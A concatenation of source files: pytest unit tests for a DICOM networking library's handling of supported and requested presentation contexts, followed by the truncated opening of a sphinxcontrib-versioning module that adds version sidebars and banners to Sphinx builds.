DEFAULT_TRANSFER_SYNTAXES def test_add_supported_context_uid(self): """Tests for AE.add_supported_context using UID.""" self.ae.add_supported_context(UID('1.2.840.10008.1.1')) context = self.ae.supported_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES def test_add_supported_context_duplicate(self): """Tests for AE.add_supported_context using a duplicate UID.""" self.ae.add_supported_context(UID('1.2.840.10008.1.1')) self.ae.add_supported_context(UID('1.2.840.10008.1.1')) contexts = self.ae.supported_contexts assert len(contexts) == 1 assert contexts[0].abstract_syntax == '1.2.840.10008.1.1' assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES def test_add_supported_context_transfer_single(self): """Test adding a single transfer syntax without a list""" self.ae.add_supported_context('1.2', '1.3') contexts = self.ae.supported_contexts assert len(contexts) == 1 assert contexts[0].abstract_syntax == '1.2' assert contexts[0].transfer_syntax == ['1.3'] self.ae.add_supported_context('1.2', UID('1.4')) contexts = self.ae.supported_contexts assert len(contexts) == 1 assert contexts[0].abstract_syntax == '1.2' assert contexts[0].transfer_syntax == ['1.3', '1.4'] def test_add_supported_context_duplicate_transfer(self): """Test adding duplicate transfer syntaxes.""" self.ae.add_supported_context('1.2', ['1.3', '1.3']) contexts = self.ae.supported_contexts assert len(contexts) == 1 assert contexts[0].abstract_syntax == '1.2' assert contexts[0].transfer_syntax == ['1.3'] self.ae.supported_contexts = [] self.ae.add_supported_context('1.2.840.10008.1.1') self.ae.add_supported_context('1.2.840.10008.1.1') contexts = self.ae.supported_contexts assert len(contexts) == 1 assert contexts[0].abstract_syntax == '1.2.840.10008.1.1' assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES self.ae.supported_contexts = [] self.ae.add_supported_context('1.2.840.10008.1.1') 
self.ae.add_supported_context('1.2.840.10008.1.1', [DEFAULT_TRANSFER_SYNTAXES[0]]) contexts = self.ae.supported_contexts assert len(contexts) == 1 assert contexts[0].abstract_syntax == '1.2.840.10008.1.1' assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES def test_add_supported_context_duplicate_multi(self): """Tests for AE.add_supported_context using a duplicate UID.""" self.ae.add_supported_context('1.2.840.10008.1.1', [DEFAULT_TRANSFER_SYNTAXES[0]]) self.ae.add_supported_context('1.2.840.10008.1.1', DEFAULT_TRANSFER_SYNTAXES[1:]) contexts = self.ae.supported_contexts assert len(contexts) == 1 assert contexts[0].abstract_syntax == '1.2.840.10008.1.1' assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES def test_add_supported_context_private_abs(self): """Test AE.add_supported_context with a private abstract syntax""" self.ae.add_supported_context('1.2.3.4') contexts = self.ae.supported_contexts assert len(contexts) == 1 assert contexts[0].abstract_syntax == '1.2.3.4' assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES def test_add_supported_context_private_tran(self): """Test AE.add_supported_context with a private transfer syntax""" self.ae.add_supported_context('1.2.3.4', ['1.2.3', '1.2.840.10008.1.1']) contexts = self.ae.supported_contexts assert len(contexts) == 1 assert contexts[0].abstract_syntax == '1.2.3.4' assert contexts[0].transfer_syntax == ['1.2.3', '1.2.840.10008.1.1'] def test_add_supported_context_more_128(self): """Test adding more than 128 presentation contexts""" for ii in range(300): self.ae.add_supported_context(str(ii)) contexts = self.ae.supported_contexts assert len(contexts) == 300 def test_supported_contexts_setter(self): """Test the AE.supported_contexts property setter.""" context = build_context('1.2.840.10008.1.1') self.ae.supported_contexts = [context] contexts = self.ae.supported_contexts assert len(contexts) == 1 assert context.abstract_syntax == '1.2.840.10008.1.1' assert 
context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert context.context_id is None def test_supported_contexts_empty(self): """Test the setting supported_contexts to an empty list.""" context = build_context('1.2.840.10008.1.1') self.ae.supported_contexts = [context] assert len(self.ae.supported_contexts) == 1 self.ae.supported_contexts = [] assert len(self.ae.supported_contexts) == 0 def test_supported_contexts_setter_raises(self): """Test the AE.supported_contexts property raises if not context.""" with pytest.raises(ValueError): self.ae.supported_contexts = ['1.2.3'] def test_supported_contexts_sorted(self): """Test that the supported_contexts returns contexts in order.""" self.ae.add_supported_context('1.2.3.4') self.ae.add_supported_context('1.2.3.5') asyntaxes = [ cntx.abstract_syntax for cntx in self.ae.supported_contexts ] assert asyntaxes == ['1.2.3.4', '1.2.3.5'] self.ae.add_supported_context('0.1.2.3') self.ae.add_supported_context('2.1.2.3') asyntaxes = [ cntx.abstract_syntax for cntx in self.ae.supported_contexts ] assert asyntaxes == ['0.1.2.3', '1.2.3.4', '1.2.3.5', '2.1.2.3'] def test_supported_contexts_more_128(self): """Test setting supported_contexts with more than 128 contexts.""" contexts = [] for ii in range(300): contexts.append(build_context(str(ii))) self.ae.supported_contexts = contexts assert len(self.ae.supported_contexts) == 300 def test_remove_supported_context_str(self): """Tests for AE.remove_supported_context using str.""" self.ae.add_supported_context('1.2.840.10008.1.1') context = self.ae.supported_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES self.ae.remove_supported_context('1.2.840.10008.1.1') assert len(self.ae.supported_contexts) == 0 # Test multiple self.ae.add_supported_context('1.2.840.10008.1.1') self.ae.add_supported_context('1.2.840.10008.1.4', ['1.2.3.4']) assert len(self.ae.supported_contexts) == 2 
self.ae.remove_supported_context('1.2.840.10008.1.1') assert len(self.ae.supported_contexts) == 1 for context in self.ae.supported_contexts: assert context.abstract_syntax != '1.2.840.10008.1.1' def test_remove_supported_context_uid(self): """Tests for AE.remove_supported_context using UID.""" self.ae.add_supported_context('1.2.840.10008.1.1') context = self.ae.supported_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES self.ae.remove_supported_context(UID('1.2.840.10008.1.1')) assert len(self.ae.supported_contexts) == 0 def test_remove_supported_context_sop_class(self): """Tests for AE.remove_supported_context using SOPClass.""" self.ae.add_supported_context(RTImageStorage) context = self.ae.supported_contexts[0] assert context.abstract_syntax == '1.2.840.10008.5.1.4.1.1.481.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES self.ae.remove_supported_context(RTImageStorage) assert len(self.ae.supported_contexts) == 0 def test_remove_supported_context_default(self): """Tests for AE.remove_supported_context with default transfers.""" self.ae.add_supported_context('1.2.840.10008.1.1') context = self.ae.supported_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert len(context.transfer_syntax) == 3 self.ae.remove_supported_context('1.2.840.10008.1.1') assert len(self.ae.supported_contexts) == 0 def test_remove_supported_context_single_transfer(self): """Tests for AE.remove_supported_context with single transfer.""" self.ae.add_supported_context('1.2.840.10008.1.1') context = self.ae.supported_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert len(context.transfer_syntax) == 3 self.ae.remove_supported_context('1.2.840.10008.1.1', DEFAULT_TRANSFER_SYNTAXES[0]) context = self.ae.supported_contexts[0] assert 
context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:] def test_remove_supported_context_partial(self): """Tests for AE.remove_supported_context with partial transfers.""" # Test singular self.ae.add_supported_context('1.2.840.10008.1.1') context = self.ae.supported_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert len(context.transfer_syntax) == 3 self.ae.remove_supported_context('1.2.840.10008.1.1', ['1.2.840.10008.1.2']) assert len(self.ae.supported_contexts) == 1 context = self.ae.supported_contexts[0] assert len(context.transfer_syntax) == 2 assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:] assert context.abstract_syntax == '1.2.840.10008.1.1' # Test multiple self.ae.add_supported_context('1.2.840.10008.1.1') self.ae.add_supported_context(RTImageStorage) self.ae.remove_supported_context('1.2.840.10008.1.1', ['1.2.840.10008.1.2']) assert len(self.ae.supported_contexts) == 2 context = self.ae.supported_contexts[0] assert len(context.transfer_syntax) == 2 assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:] assert context.abstract_syntax == '1.2.840.10008.1.1' assert self.ae.supported_contexts[1].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES def test_remove_supported_context_all(self): """Tests for AE.remove_supported_context with all transfers.""" self.ae.add_supported_context('1.2.840.10008.1.1') context = self.ae.supported_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert len(context.transfer_syntax) == 3 # Test singular self.ae.remove_supported_context('1.2.840.10008.1.1', DEFAULT_TRANSFER_SYNTAXES) assert len(self.ae.supported_contexts) == 0 # Test multiple self.ae.add_supported_context('1.2.840.10008.1.1') self.ae.add_supported_context(RTImageStorage) self.ae.remove_supported_context('1.2.840.10008.1.1', 
DEFAULT_TRANSFER_SYNTAXES) context = self.ae.supported_contexts[0] assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert context.abstract_syntax == '1.2.840.10008.5.1.4.1.1.481.1' def test_remove_supported_context_all_plus(self): """Test remove_supported_context with extra transfers""" tsyntax = DEFAULT_TRANSFER_SYNTAXES[:] tsyntax.append('1.2.3') self.ae.add_supported_context('1.2.840.10008.1.1') context = self.ae.supported_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert len(context.transfer_syntax) == 3 self.ae.remove_supported_context('1.2.840.10008.1.1', tsyntax) assert len(self.ae.supported_contexts) == 0 def test_scu_role(self): """Test add_supported_context with scu_role parameter.""" self.ae.add_supported_context('1.2.3') context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is None self.ae.supported_context = [] self.ae.add_supported_context('1.2.3', scu_role=None) context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is None self.ae.supported_context = [] self.ae.add_supported_context('1.2.3', scu_role=True) context = self.ae.supported_contexts[0] assert context.scu_role is True assert context.scp_role is None self.ae.supported_context = [] self.ae.add_supported_context('1.2.3', scu_role=False) context = self.ae.supported_contexts[0] assert context.scu_role is False assert context.scp_role is None def test_scu_role_update(self): """Test updating add_supported_context with scu_role parameter.""" self.ae.add_supported_context('1.2.3') context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is None self.ae.add_supported_context('1.2.3', scu_role=None) context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is None self.ae.add_supported_context('1.2.3', scu_role=True) context = 
self.ae.supported_contexts[0] assert context.scu_role is True assert context.scp_role is None self.ae.add_supported_context('1.2.3', scu_role=False) context = self.ae.supported_contexts[0] assert context.scu_role is False assert context.scp_role is None def test_scu_role_raises(self): """Test add_supported_context raises if scu_role wrong type.""" with pytest.raises(TypeError, match=""): self.ae.add_supported_context('1.2.3', scu_role='abc') assert self.ae.supported_contexts == [] def test_scp_role(self): """Test add_supported_context with scu_role parameter.""" self.ae.add_supported_context('1.2.3') context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is None self.ae.supported_context = [] self.ae.add_supported_context('1.2.3', scp_role=None) context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is None self.ae.supported_context = [] self.ae.add_supported_context('1.2.3', scp_role=True) context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is True self.ae.supported_context = [] self.ae.add_supported_context('1.2.3', scp_role=False) context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is False def test_scp_role_update(self): """Test updating add_supported_context with scp_role parameter.""" self.ae.add_supported_context('1.2.3') context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is None self.ae.add_supported_context('1.2.3', scp_role=None) context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is None self.ae.add_supported_context('1.2.3', scp_role=True) context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is True self.ae.add_supported_context('1.2.3', scp_role=False) context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is False 
    def test_scp_role_raises(self):
        """Test add_supported_context raises if scp_role wrong type."""
        with pytest.raises(TypeError, match=""):
            self.ae.add_supported_context('1.2.3', scp_role='abc')

        # Nothing should have been added on failure.
        assert self.ae.supported_contexts == []


class TestAERequestedPresentationContexts(object):
    """Tests for AE's presentation contexts when acting as an SCU"""

    def setup(self):
        """Run before each test: create a fresh AE."""
        self.ae = AE()

    def test_add_requested_context_str(self):
        """Tests for AE.add_requested_context using str."""
        self.ae.add_requested_context('1.2.840.10008.1.1')

        context = self.ae.requested_contexts[0]
        assert context.abstract_syntax == '1.2.840.10008.1.1'
        assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
        assert context.context_id is None

    def test_add_requested_context_sop_class(self):
        """Tests for AE.add_requested_context using SOPClass."""
        self.ae.add_requested_context(RTImageStorage)

        context = self.ae.requested_contexts[0]
        assert context.abstract_syntax == '1.2.840.10008.5.1.4.1.1.481.1'
        assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES

    def test_add_requested_context_uid(self):
        """Tests for AE.add_requested_context using UID."""
        self.ae.add_requested_context(UID('1.2.840.10008.1.1'))

        context = self.ae.requested_contexts[0]
        assert context.abstract_syntax == '1.2.840.10008.1.1'
        assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES

    def test_add_requested_context_duplicate(self):
        """Test AE.add_requested_context using a duplicate UID."""
        # Unlike supported contexts, requested contexts may be duplicated.
        self.ae.add_requested_context(UID('1.2.840.10008.1.1'))
        self.ae.add_requested_context(UID('1.2.840.10008.1.1'))

        contexts = self.ae.requested_contexts
        assert len(contexts) == 2
        assert contexts[0].abstract_syntax == '1.2.840.10008.1.1'
        assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
        assert contexts[1].abstract_syntax == '1.2.840.10008.1.1'
        assert contexts[1].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES

    def test_add_requested_context_duplicate_multi(self):
        """Tests for AE.add_requested_context using a duplicate UID."""
        self.ae.add_requested_context('1.2.840.10008.1.1',
                                      [DEFAULT_TRANSFER_SYNTAXES[0]])
        self.ae.add_requested_context('1.2.840.10008.1.1',
                                      DEFAULT_TRANSFER_SYNTAXES[1:])

        contexts = self.ae.requested_contexts
        assert len(contexts) == 2
        assert contexts[0].abstract_syntax == '1.2.840.10008.1.1'
        assert contexts[0].transfer_syntax == [DEFAULT_TRANSFER_SYNTAXES[0]]
        assert contexts[1].abstract_syntax == '1.2.840.10008.1.1'
        assert contexts[1].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:]

    def test_add_supported_context_transfer_single(self):
        """Test adding a single transfer syntax without a list"""
        self.ae.add_requested_context('1.2', '1.3')

        contexts = self.ae.requested_contexts
        assert len(contexts) == 1
        assert contexts[0].abstract_syntax == '1.2'
        assert contexts[0].transfer_syntax == ['1.3']

        self.ae.add_requested_context('1.2', UID('1.4'))

        contexts = self.ae.requested_contexts
        assert len(contexts) == 2
        assert contexts[1].abstract_syntax == '1.2'
        assert contexts[1].transfer_syntax == ['1.4']

    def test_add_requested_context_duplicate_transfer(self):
        """Test add_requested_context using duplicate transfer syntaxes"""
        self.ae.add_requested_context('1.2', ['1.3', '1.3'])

        contexts = self.ae.requested_contexts
        assert contexts[0].transfer_syntax == ['1.3']

    def test_add_requested_context_private_abs(self):
        """Test AE.add_requested_context with a private abstract syntax"""
        self.ae.add_requested_context('1.2.3.4')

        contexts = self.ae.requested_contexts
        assert len(contexts) == 1
        assert contexts[0].abstract_syntax == '1.2.3.4'
        assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES

    def test_add_requested_context_private_tran(self):
        """Test AE.add_requested_context with a private transfer syntax"""
        self.ae.add_requested_context('1.2.3.4',
                                      ['1.2.3', '1.2.840.10008.1.1'])

        contexts = self.ae.requested_contexts
        assert len(contexts) == 1
        assert contexts[0].abstract_syntax == '1.2.3.4'
        assert contexts[0].transfer_syntax == ['1.2.3', '1.2.840.10008.1.1']

    def test_add_requested_context_more_128_raises(self):
        """Test adding more than 128 presentation contexts"""
        # 128 is the maximum number of presentation contexts allowed by the
        # DICOM standard for a single association request.
        for ii in range(128):
            self.ae.add_requested_context(str(ii))

        assert len(self.ae.requested_contexts) == 128

        with pytest.raises(ValueError):
            self.ae.add_requested_context('129')

        assert len(self.ae.requested_contexts) == 128

    def test_requested_contexts_setter(self):
        """Test the AE.requested_contexts property setter."""
        context = build_context('1.2.840.10008.1.1')
        self.ae.requested_contexts = [context]

        contexts = self.ae.requested_contexts
        assert len(contexts) == 1
        assert context.abstract_syntax == '1.2.840.10008.1.1'
        assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
        assert context.context_id is None

    def test_requested_contexts_empty(self):
        """Test the setting requested_contexts to an empty list."""
        context = build_context('1.2.840.10008.1.1')
        self.ae.requested_contexts = [context]
        assert len(self.ae.requested_contexts) == 1

        self.ae.requested_contexts = []
        assert len(self.ae.requested_contexts) == 0

    def test_requested_contexts_setter_raises(self):
        """Test the AE.requested_contexts property raises if not context."""
        with pytest.raises(ValueError):
            self.ae.requested_contexts = ['1.2.3']

    def test_requested_contexts_not_sorted(self):
        """Test that requested_contexts returns contexts in supplied order."""
        self.ae.add_requested_context('1.2.3.4')
        self.ae.add_requested_context('1.2.3.5')

        asyntaxes = [
            cntx.abstract_syntax for cntx in self.ae.requested_contexts
        ]
        assert asyntaxes == ['1.2.3.4', '1.2.3.5']

        self.ae.add_requested_context('0.1.2.3')
        self.ae.add_requested_context('2.1.2.3')
        asyntaxes = [
            cntx.abstract_syntax for cntx in self.ae.requested_contexts
        ]
        assert asyntaxes == ['1.2.3.4', '1.2.3.5', '0.1.2.3', '2.1.2.3']

    def test_requested_contexts_more_128(self):
        """Test setting requested_contexts with more than 128 contexts."""
        contexts = []
        for ii in range(128):
            contexts.append(build_context(str(ii)))

        self.ae.requested_contexts = contexts
        assert len(self.ae.requested_contexts) == 128

        contexts.append(build_context('129'))

        with pytest.raises(ValueError):
            self.ae.requested_contexts = contexts

    def test_remove_requested_context_str(self):
        """Tests for AE.remove_requested_context using str."""
        # Test singular
        self.ae.add_requested_context('1.2.840.10008.1.1')

        context = self.ae.requested_contexts[0]
        assert context.abstract_syntax == '1.2.840.10008.1.1'
        assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES

        self.ae.remove_requested_context('1.2.840.10008.1.1')
        assert len(self.ae.requested_contexts) == 0

        # Test multiple
        self.ae.add_requested_context('1.2.840.10008.1.1')
        self.ae.add_requested_context('1.2.840.10008.1.1', ['1.2.3.4'])
        self.ae.add_requested_context('1.2.840.10008.1.4', ['1.2.3.4'])

        assert len(self.ae.requested_contexts) == 3
        self.ae.remove_requested_context('1.2.840.10008.1.1')
        assert len(self.ae.requested_contexts) == 1

        for context in self.ae.requested_contexts:
            assert context.abstract_syntax != '1.2.840.10008.1.1'

    def test_remove_requested_context_uid(self):
        """Tests for AE.remove_requested_context using UID."""
        self.ae.add_requested_context('1.2.840.10008.1.1')

        context = self.ae.requested_contexts[0]
        assert context.abstract_syntax == '1.2.840.10008.1.1'
        assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES

        self.ae.remove_requested_context(UID('1.2.840.10008.1.1'))
        assert len(self.ae.requested_contexts) == 0

    def test_remove_requested_context_sop_class(self):
        """Tests for AE.remove_requested_context using SOPClass."""
        self.ae.add_requested_context(RTImageStorage)

        context = self.ae.requested_contexts[0]
        assert context.abstract_syntax == '1.2.840.10008.5.1.4.1.1.481.1'
        assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES

        self.ae.remove_requested_context(RTImageStorage)
        assert len(self.ae.requested_contexts) == 0

    def test_remove_requested_context_default(self):
        """Tests for AE.remove_requested_context with default transfers."""
        self.ae.add_requested_context('1.2.840.10008.1.1')

        context = self.ae.requested_contexts[0]
        assert context.abstract_syntax == '1.2.840.10008.1.1'
        assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
        assert len(context.transfer_syntax) == 3

        self.ae.remove_requested_context('1.2.840.10008.1.1')
        assert len(self.ae.requested_contexts) == 0

    def test_remove_requested_context_single(self):
        """Tests for AE.remove_requested_context with single transfer."""
        self.ae.add_requested_context('1.2.840.10008.1.1')

        context = self.ae.requested_contexts[0]
        assert context.abstract_syntax == '1.2.840.10008.1.1'
        assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
        assert len(context.transfer_syntax) == 3

        self.ae.remove_requested_context('1.2.840.10008.1.1',
                                         DEFAULT_TRANSFER_SYNTAXES[0])
        context = self.ae.requested_contexts[0]
        assert context.abstract_syntax == '1.2.840.10008.1.1'
        assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:]

    def test_remove_requested_context_partial(self):
        """Tests for AE.remove_supported_context with partial transfers."""
        # Test singular
        self.ae.add_requested_context('1.2.840.10008.1.1')

        context = self.ae.requested_contexts[0]
        assert context.abstract_syntax == '1.2.840.10008.1.1'
        assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
        assert len(context.transfer_syntax) == 3

        self.ae.remove_requested_context('1.2.840.10008.1.1',
                                         ['1.2.840.10008.1.2'])
        assert len(self.ae.requested_contexts) == 1
        context = self.ae.requested_contexts[0]
        assert len(context.transfer_syntax) == 2
        assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:]
        assert context.abstract_syntax == '1.2.840.10008.1.1'

        self.ae.remove_requested_context('1.2.840.10008.1.1')
        assert len(self.ae.requested_contexts) == 0

        # Test multiple
        self.ae.add_requested_context('1.2.840.10008.1.1')
        self.ae.add_requested_context(RTImageStorage)
        self.ae.add_requested_context('1.2.840.10008.1.1', ['1.2.3.4'])

        self.ae.remove_requested_context('1.2.840.10008.1.1',
                                         ['1.2.840.10008.1.2'])
        assert len(self.ae.requested_contexts) == 3
        context = self.ae.requested_contexts[0]
        assert len(context.transfer_syntax) == 2
        assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:]
        assert context.abstract_syntax == '1.2.840.10008.1.1'
        assert self.ae.requested_contexts[1].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
        assert self.ae.requested_contexts[2].transfer_syntax == ['1.2.3.4']
        assert self.ae.requested_contexts[2].abstract_syntax == '1.2.840.10008.1.1'

        self.ae.remove_requested_context('1.2.840.10008.1.1')
        assert len(self.ae.requested_contexts) == 1
        assert self.ae.requested_contexts[0].abstract_syntax == '1.2.840.10008.5.1.4.1.1.481.1'

    def test_remove_requested_context_all(self):
        """Tests for AE.remove_requested_context with all transfers."""
        self.ae.add_requested_context('1.2.840.10008.1.1')

        context = self.ae.requested_contexts[0]
        assert context.abstract_syntax == '1.2.840.10008.1.1'
        assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
        assert len(context.transfer_syntax) == 3

        # Test singular
        self.ae.remove_requested_context('1.2.840.10008.1.1',
                                         DEFAULT_TRANSFER_SYNTAXES)
        assert len(self.ae.requested_contexts) == 0

        # Test multiple
        self.ae.add_requested_context('1.2.840.10008.1.1',
                                      [DEFAULT_TRANSFER_SYNTAXES[0]])
        self.ae.add_requested_context('1.2.840.10008.1.1',
                                      DEFAULT_TRANSFER_SYNTAXES[1:])
        self.ae.add_requested_context(RTImageStorage)

        self.ae.remove_requested_context('1.2.840.10008.1.1',
                                         DEFAULT_TRANSFER_SYNTAXES)
        assert len(self.ae.requested_contexts) == 1
        context = self.ae.requested_contexts[0]
        assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
        assert context.abstract_syntax == '1.2.840.10008.5.1.4.1.1.481.1'

    def test_remove_requested_context_all_plus(self):
        """Test remove_requested_context with extra transfers"""
        # Removal list contains every default transfer plus one extra.
        tsyntax = DEFAULT_TRANSFER_SYNTAXES[:]
        tsyntax.append('1.2.3')

        # Test singular
        self.ae.add_requested_context('1.2.840.10008.1.1')

        context = self.ae.requested_contexts[0]
        assert context.abstract_syntax == '1.2.840.10008.1.1'
        assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
        assert len(context.transfer_syntax) == 3

        self.ae.remove_requested_context('1.2.840.10008.1.1', tsyntax)
        assert len(self.ae.requested_contexts) == 0

        # Test multiple
        self.ae.add_requested_context('1.2.840.10008.1.1',
                                      [DEFAULT_TRANSFER_SYNTAXES[0]])
        self.ae.add_requested_context('1.2.840.10008.1.1',
                                      DEFAULT_TRANSFER_SYNTAXES[1:])
        self.ae.add_requested_context(RTImageStorage)

        self.ae.remove_requested_context('1.2.840.10008.1.1', tsyntax)
        assert len(self.ae.requested_contexts) == 1
        context = self.ae.requested_contexts[0]
        assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
        assert context.abstract_syntax == '1.2.840.10008.5.1.4.1.1.481.1'
sphinx_.py
"""Interface with Sphinx.""" import datetime import logging import multiprocessing import os import sys from sphinx import application, build_main, locale from sphinx.builders.html import StandaloneHTMLBuilder from sphinx.config import Config as SphinxConfig from sphinx.errors import SphinxError from sphinx.jinja2glue import SphinxFileSystemLoader from sphinx.util.i18n import format_date from sphinxcontrib.versioning import __version__ from sphinxcontrib.versioning.lib import Config, HandledError, TempDir from sphinxcontrib.versioning.versions import Versions SC_VERSIONING_VERSIONS = list() # Updated after forking. STATIC_DIR = os.path.join(os.path.dirname(__file__), '_static') class EventHandlers(object): """Hold Sphinx event handlers as static or class methods. :ivar multiprocessing.queues.Queue ABORT_AFTER_READ: Communication channel to parent process. :ivar bool BANNER_GREATEST_TAG: Banner URLs point to greatest/highest (semver) tag. :ivar str BANNER_MAIN_VERSION: Banner URLs point to this remote name (from Versions.__getitem__()). :ivar bool BANNER_RECENT_TAG: Banner URLs point to most recently committed tag. :ivar str CURRENT_VERSION: Current version being built. :ivar bool IS_ROOT: Value for context['scv_is_root']. :ivar bool SHOW_BANNER: Display the banner. :ivar sphinxcontrib.versioning.versions.Versions VERSIONS: Versions class instance. """ ABORT_AFTER_READ = None BANNER_GREATEST_TAG = False BANNER_MAIN_VERSION = None BANNER_RECENT_TAG = False CURRENT_VERSION = None IS_ROOT = False SHOW_BANNER = False VERSIONS = None @staticmethod def builder_inited(app): """Update the Sphinx builder. :param sphinx.application.Sphinx app: Sphinx application object. """ # Add this extension's _templates directory to Sphinx. 
templates_dir = os.path.join(os.path.dirname(__file__), '_templates') app.builder.templates.pathchain.insert(0, templates_dir) app.builder.templates.loaders.insert(0, SphinxFileSystemLoader(templates_dir)) app.builder.templates.templatepathlen += 1 # Add versions.html to sidebar. if '**' not in app.config.html_sidebars: try: app.config.html_sidebars['**'] = StandaloneHTMLBuilder.default_sidebars + ['versions.html'] except AttributeError as e: app.config.html_sidebars['**'] = ['versions.html'] elif 'versions.html' not in app.config.html_sidebars['**']: app.config.html_sidebars['**'].append('versions.html') @classmethod def env_updated(cls, app, env): """Abort Sphinx after initializing config and discovering all pages to build. :param sphinx.application.Sphinx app: Sphinx application object. :param sphinx.environment.BuildEnvironment env: Sphinx build environment. """ if cls.ABORT_AFTER_READ: config = {n: getattr(app.config, n) for n in (a for a in dir(app.config) if a.startswith('scv_'))} config['found_docs'] = tuple(str(d) for d in env.found_docs) config['master_doc'] = str(app.config.master_doc) cls.ABORT_AFTER_READ.put(config) sys.exit(0) @classmethod def html_page_context(cls, app, pagename, templatename, context, doctree): """Update the Jinja2 HTML context, exposes the Versions class instance to it. :param sphinx.application.Sphinx app: Sphinx application object. :param str pagename: Name of the page being rendered (without .html or any file extension). :param str templatename: Page name with .html. :param dict context: Jinja2 HTML context. :param docutils.nodes.document doctree: Tree of docutils nodes. """ assert templatename or doctree # Unused, for linting. cls.VERSIONS.context = context versions = cls.VERSIONS this_remote = versions[cls.CURRENT_VERSION] banner_main_remote = versions[cls.BANNER_MAIN_VERSION] if cls.SHOW_BANNER else None # Update Jinja2 context. 
context['bitbucket_version'] = cls.CURRENT_VERSION context['current_version'] = cls.CURRENT_VERSION context['github_version'] = cls.CURRENT_VERSION context['html_theme'] = app.config.html_theme context['scv_banner_greatest_tag'] = cls.BANNER_GREATEST_TAG context['scv_banner_main_ref_is_branch'] = banner_main_remote['kind'] == 'heads' if cls.SHOW_BANNER else None context['scv_banner_main_ref_is_tag'] = banner_main_remote['kind'] == 'tags' if cls.SHOW_BANNER else None context['scv_banner_main_version'] = banner_main_remote['name'] if cls.SHOW_BANNER else None context['scv_banner_recent_tag'] = cls.BANNER_RECENT_TAG context['scv_is_branch'] = this_remote['kind'] == 'heads' context['scv_is_greatest_tag'] = this_remote == versions.greatest_tag_remote context['scv_is_recent_branch'] = this_remote == versions.recent_branch_remote context['scv_is_recent_ref'] = this_remote == versions.recent_remote context['scv_is_recent_tag'] = this_remote == versions.recent_tag_remote context['scv_is_root'] = cls.IS_ROOT context['scv_is_tag'] = this_remote['kind'] == 'tags' context['scv_show_banner'] = cls.SHOW_BANNER context['versions'] = versions context['vhasdoc'] = versions.vhasdoc context['vpathto'] = versions.vpathto # Insert banner into body. if cls.SHOW_BANNER and 'body' in context: parsed = app.builder.templates.render('banner.html', context) context['body'] = parsed + context['body'] # Handle overridden css_files. css_files = context.setdefault('css_files', list()) if '_static/banner.css' not in css_files: css_files.append('_static/banner.css') # Handle overridden html_static_path. if STATIC_DIR not in app.config.html_static_path: app.config.html_static_path.append(STATIC_DIR) # Reset last_updated with file's mtime (will be last git commit authored date). 
